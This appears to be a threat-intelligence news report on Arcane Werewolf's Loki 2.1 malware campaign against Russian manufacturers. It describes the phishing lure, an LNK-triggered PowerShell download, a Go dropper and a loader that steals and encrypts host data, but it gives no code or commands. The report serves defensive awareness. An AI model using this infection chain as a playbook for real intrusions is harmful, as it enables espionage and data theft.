The cybercriminal group known as Arcane Werewolf, also identified as Mythic Likho, has enhanced its offensive capabilities with the deployment of Loki 2.1, a new iteration of their custom malware toolkit. Researchers observed this threat actor group orchestrating campaigns specifically targeting Russian manufacturing firms during October and November of 2025. This development underscores the group’s persistent focus on the manufacturing sector and their ongoing efforts in malware development.
The updated Loki malware signifies a notable advancement, as it now possesses compatibility with both the Mythic and Havoc post-exploitation frameworks. This integration significantly broadens its utility and potential danger in the hands of sophisticated attackers. The infection vector employed by Arcane Werewolf involves meticulously crafted phishing emails designed to impersonate legitimate manufacturing companies.
Arcane Werewolf Deploys Enhanced Loki 2.1 Malware Toolkit
These deceptive emails contain links that redirect recipients to spoofed websites, which are designed to mimic authentic organizational portals. Upon clicking these malicious links, victims are prompted to download ZIP archives hosted on the attackers’ command and control (C2) infrastructure. This tactic leverages the inherent trust users place in communications appearing to originate from reputable brands and organizations.
Once a victim downloads and opens the compromised archive, the multi-stage infection process commences. Analysts from Bi.Zone identified the malware through their tracking of the distribution method and subsequent analysis of the infection chain. The initial stage of the attack is triggered when a victim accesses a malicious shortcut file (LNK file) embedded within the downloaded ZIP archive.
This LNK file executes a command that utilizes PowerShell to download an executable file from the attacker-controlled server. This downloaded file is presented as an image file, functioning as a sophisticated dropper written in the Go programming language. Crucially, this dropper contains encoded malicious payloads that are concealed within its structure.
The Loki 2.1 Infection Mechanism and Its Implications
The Go dropper operates by decoding and sequentially executing two distinct payloads. The first payload is a malicious loader, named chrome_proxy.pdf, which establishes communication with the attacker’s C2 server. This loader is tasked with compiling and collecting critical system information from the compromised computer.
The data gathered includes details such as the computer’s name, the installed operating system version, internal IP addresses, and the logged-in username. This stolen information is then encrypted using the AES encryption algorithm and transmitted back to the threat actors via secure HTTPS connections, making detection more challenging.
Following data exfiltration, the loader remains active and awaits further instructions from the attackers. It is equipped to inject malicious code into legitimate running processes, upload files to the victim’s system, or extract additional sensitive data. Furthermore, the loader possesses the capability to terminate specific processes on the infected computer. This functionality grants attackers significant control, enabling them to disrupt security software or other applications that might impede their operations.
The continued evolution of Arcane Werewolf’s tactics and their consistent targeting of the manufacturing sector suggest a strategic long-term objective. The integration of Loki 2.1 with established post-exploitation frameworks indicates a refined approach to achieving deeper system compromise and data theft. The group’s reliance on social engineering through phishing emails highlights the enduring efficacy of human manipulation in cybersecurity attacks.
Looking ahead, security researchers will likely focus on monitoring for further iterations of the Loki malware and any new attack vectors employed by Arcane Werewolf. The resilience and adaptability of this threat actor group necessitate vigilant defense strategies within the manufacturing industry and beyond, as they continue to refine their tools and techniques for cyber espionage and illicit data acquisition.